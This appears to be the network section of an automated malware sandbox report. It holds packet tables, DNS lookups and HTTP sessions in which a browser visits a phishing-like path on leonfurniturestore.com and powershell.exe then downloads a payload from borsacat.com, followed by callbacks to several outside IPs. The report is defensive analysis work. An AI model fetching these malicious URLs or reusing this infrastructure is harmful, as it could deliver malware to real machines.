Feb 12, 2019 20:13:02.107796907 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.139389038 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.139410973 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.139532089 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.139571905 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.139628887 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.139659882 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.139688015 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.139718056 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.139746904 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.139843941 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.139883995 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.139909029 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.139981985 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.140017033 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.170738935 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.170799971 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.170850039 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.170878887 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.170900106 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.170922041 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.170958042 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.170984983 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.171010971 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.171034098 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.171149015 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.171194077 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.172239065 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.201862097 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.201901913 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.201931000 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.201991081 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.202039957 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.202102900 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.202116966 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.202146053 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.202984095 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.203037024 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.203092098 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.203305960 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.233059883 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.233098030 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.233129978 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.233158112 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.233203888 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.233372927 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.234075069 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.234112024 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.234138012 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.234164000 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.234210968 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.234651089 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.234692097 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.234857082 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.263885975 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.263923883 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.263951063 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.263986111 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.264024973 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.265382051 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.265422106 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.265467882 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.265479088 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.265522003 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.265558004 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.265583992 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.265613079 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.295144081 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.295181036 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.295206070 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.295231104 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.295269966 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.296350956 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.296458960 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.296538115 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.296545029 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.296588898 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.296638012 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.296678066 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.296685934 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.296756029 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.326261044 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.326420069 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.326483011 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.326495886 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.326517105 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.326586962 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.327299118 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.327351093 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.327406883 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.327444077 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.327464104 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.327493906 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.327568054 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.327615023 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.340084076 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.399004936 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.399046898 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.399075985 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.399102926 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.399158001 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.399234056 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.399301052 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.399317026 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.399728060 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.429800034 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.429843903 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.429896116 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.429927111 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.429941893 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.429958105 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.429974079 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.430259943 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.430289030 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.430305958 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.430403948 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.430440903 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.430474043 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.430723906 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.461740017 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.461788893 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.461831093 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.461982012 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.462133884 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.462178946 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.462205887 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.462209940 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.462239981 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.462270021 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.462316036 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.462354898 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.462359905 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.462373018 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.466866970 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.493976116 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.494275093 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.494358063 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.494430065 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.494455099 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.494515896 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.494545937 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.494558096 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.494575024 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.494627953 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.499057055 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.499097109 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.499140978 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.526432037 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.526487112 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.526561975 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.526588917 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.526612043 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.526659012 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.526700974 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.526722908 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.526746035 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.526820898 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.529714108 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.529756069 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.529813051 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.529845953 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.558239937 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.558300972 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.558340073 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.558448076 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.558506012 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.558526993 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.558554888 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.558558941 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.558702946 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.558746099 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.560910940 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.560942888 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.561152935 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.561230898 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.589127064 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.589169025 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.589195967 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.589226961 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.589257002 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.589359999 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.591973066 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.621845961 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.621912003 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.621939898 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.621982098 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.622011900 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.622028112 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.622040987 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.623708963 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.654042006 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.654083967 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.654110909 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.654136896 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.654263973 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.655940056 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.655981064 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.656122923 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.685142994 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.685184956 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.685213089 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.685239077 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.685384035 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.685436964 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.685463905 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.685491085 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.687490940 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.687531948 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.687704086 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.687756062 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.716766119 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.716830969 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.716860056 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.716891050 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.716938019 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.716999054 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.717036009 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.719222069 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.719263077 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.719413042 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.719485044 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.748128891 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.748200893 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.748235941 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.748271942 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.748399019 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.750556946 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.756611109 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:02.779481888 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.779517889 CET	80	49231	185.2.4.75	192.168.1.16
Feb 12, 2019 20:13:02.779716015 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:03.552023888 CET	49231	80	192.168.1.16	185.2.4.75
Feb 12, 2019 20:13:04.939016104 CET	80	49222	184.175.67.101	192.168.1.16
Feb 12, 2019 20:13:04.939162970 CET	49222	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:13:32.183868885 CET	62987	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:13:32.211658001 CET	53	62987	8.8.8.8	192.168.1.16
Feb 12, 2019 20:13:32.261043072 CET	49234	443	192.168.1.16	184.101.191.86
Feb 12, 2019 20:13:35.275908947 CET	49234	443	192.168.1.16	184.101.191.86
Feb 12, 2019 20:13:41.291460991 CET	49234	443	192.168.1.16	184.101.191.86
Feb 12, 2019 20:13:49.975699902 CET	49222	80	192.168.1.16	184.175.67.101
Feb 12, 2019 20:13:49.975836992 CET	49224	443	192.168.1.16	184.175.67.101
Feb 12, 2019 20:13:53.374639988 CET	49235	443	192.168.1.16	184.101.191.86
Feb 12, 2019 20:13:56.369808912 CET	49235	443	192.168.1.16	184.101.191.86
Feb 12, 2019 20:14:02.448437929 CET	49235	443	192.168.1.16	184.101.191.86
Feb 12, 2019 20:14:18.295737028 CET	49236	80	192.168.1.16	181.15.224.57
Feb 12, 2019 20:14:21.306782007 CET	49236	80	192.168.1.16	181.15.224.57
Feb 12, 2019 20:14:27.306844950 CET	49236	80	192.168.1.16	181.15.224.57
Feb 12, 2019 20:14:32.188111067 CET	80	49236	181.15.224.57	192.168.1.16
Feb 12, 2019 20:14:32.188301086 CET	49236	80	192.168.1.16	181.15.224.57
Feb 12, 2019 20:14:33.609991074 CET	49236	80	192.168.1.16	181.15.224.57
Feb 12, 2019 20:14:35.801887035 CET	80	49236	181.15.224.57	192.168.1.16
Feb 12, 2019 20:14:44.746947050 CET	80	49236	181.15.224.57	192.168.1.16
Feb 12, 2019 20:14:44.747045994 CET	49236	80	192.168.1.16	181.15.224.57

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Feb 12, 2019 20:12:32.337133884 CET	54991	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:32.350378036 CET	53	54991	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:33.425010920 CET	51176	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:33.453460932 CET	53	51176	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:34.960808992 CET	49810	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:35.000349998 CET	53	49810	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:36.893261909 CET	55151	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:36.896470070 CET	53216	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:36.906105042 CET	53	55151	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:36.924123049 CET	53	53216	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:36.938716888 CET	49792	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:36.972624063 CET	53	49792	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:37.461997032 CET	50672	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:37.509768009 CET	53	50672	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:37.520483017 CET	54414	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:37.556268930 CET	53	54414	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:39.645396948 CET	61734	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:39.648289919 CET	55067	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:12:39.658978939 CET	53	61734	8.8.8.8	192.168.1.16
Feb 12, 2019 20:12:39.676918983 CET	53	55067	8.8.8.8	192.168.1.16
Feb 12, 2019 20:13:01.806658983 CET	64117	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:13:01.853526115 CET	53	64117	8.8.8.8	192.168.1.16
Feb 12, 2019 20:13:32.183868885 CET	62987	53	192.168.1.16	8.8.8.8
Feb 12, 2019 20:13:32.211658001 CET	53	62987	8.8.8.8	192.168.1.16

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class
Feb 12, 2019 20:12:33.425010920 CET	192.168.1.16	8.8.8.8	0x747a	Standard query (0)	leonfurniturestore.com	A (IP address)	IN (0x0001)
Feb 12, 2019 20:12:34.960808992 CET	192.168.1.16	8.8.8.8	0xa374	Standard query (0)	www.leonfurniturestore.com	A (IP address)	IN (0x0001)
Feb 12, 2019 20:13:01.806658983 CET	192.168.1.16	8.8.8.8	0x176c	Standard query (0)	borsacat.com	A (IP address)	IN (0x0001)

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class
Feb 12, 2019 20:12:33.453460932 CET	8.8.8.8	192.168.1.16	0x747a	No error (0)	leonfurniturestore.com		184.175.67.101	A (IP address)	IN (0x0001)
Feb 12, 2019 20:12:35.000349998 CET	8.8.8.8	192.168.1.16	0xa374	No error (0)	www.leonfurniturestore.com	leonfurniturestore.com		CNAME (Canonical name)	IN (0x0001)
Feb 12, 2019 20:12:35.000349998 CET	8.8.8.8	192.168.1.16	0xa374	No error (0)	leonfurniturestore.com		184.175.67.101	A (IP address)	IN (0x0001)
Feb 12, 2019 20:12:37.509768009 CET	8.8.8.8	192.168.1.16	0x61b3	No error (0)	a767.dscg3.akamai.net		23.10.249.50	A (IP address)	IN (0x0001)
Feb 12, 2019 20:12:37.509768009 CET	8.8.8.8	192.168.1.16	0x61b3	No error (0)	a767.dscg3.akamai.net		23.10.249.17	A (IP address)	IN (0x0001)
Feb 12, 2019 20:13:01.853526115 CET	8.8.8.8	192.168.1.16	0x176c	No error (0)	borsacat.com		185.2.4.75	A (IP address)	IN (0x0001)
Feb 12, 2019 20:13:32.211658001 CET	8.8.8.8	192.168.1.16	0x2bd1	No error (0)	ie9comview.vo.msecnd.net	cs9.wpc.v0cdn.net		CNAME (Canonical name)	IN (0x0001)

HTTP Request Dependency Graph

leonfurniturestore.com

borsacat.com

181.15.224.57

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
0	192.168.1.16	49223	184.175.67.101	80	C:\Program Files\Internet Explorer\iexplore.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2019 20:12:34.738228083 CET	0	OUT	GET /sec.myacc.resourses.biz/ HTTP/1.1 Accept: text/html, application/xhtml+xml, / Accept-Language: en-US User-Agent: Mozilla/5.0 (Windows NT 6.1; Trident/7.0; rv:11.0) like Gecko Accept-Encoding: gzip, deflate Host: leonfurniturestore.com DNT: 1 Connection: Keep-Alive
Feb 12, 2019 20:12:34.893855095 CET	1	IN	HTTP/1.1 301 Moved Permanently Date: Tue, 12 Feb 2019 19:12:34 GMT Server: Apache Location: https://www.leonfurniturestore.com/sec.myacc.resourses.biz/ Cache-Control: max-age=3600 Expires: Tue, 12 Feb 2019 20:12:34 GMT Content-Length: 267 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6c 65 6f 6e 66 75 72 6e 69 74 75 72 65 73 74 6f 72 65 2e 63 6f 6d 2f 73 65 63 2e 6d 79 61 63 63 2e 72 65 73 6f 75 72 73 65 73 2e 62 69 7a 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.leonfurniturestore.com/sec.myacc.resourses.biz/">here</a>.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	Process
1	192.168.1.16	49231	185.2.4.75	80	C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

Timestamp	kBytes transferred	Direction	Data
Feb 12, 2019 20:13:01.920069933 CET	217	OUT	GET /9onrkqJ HTTP/1.1 Host: borsacat.com Connection: Keep-Alive
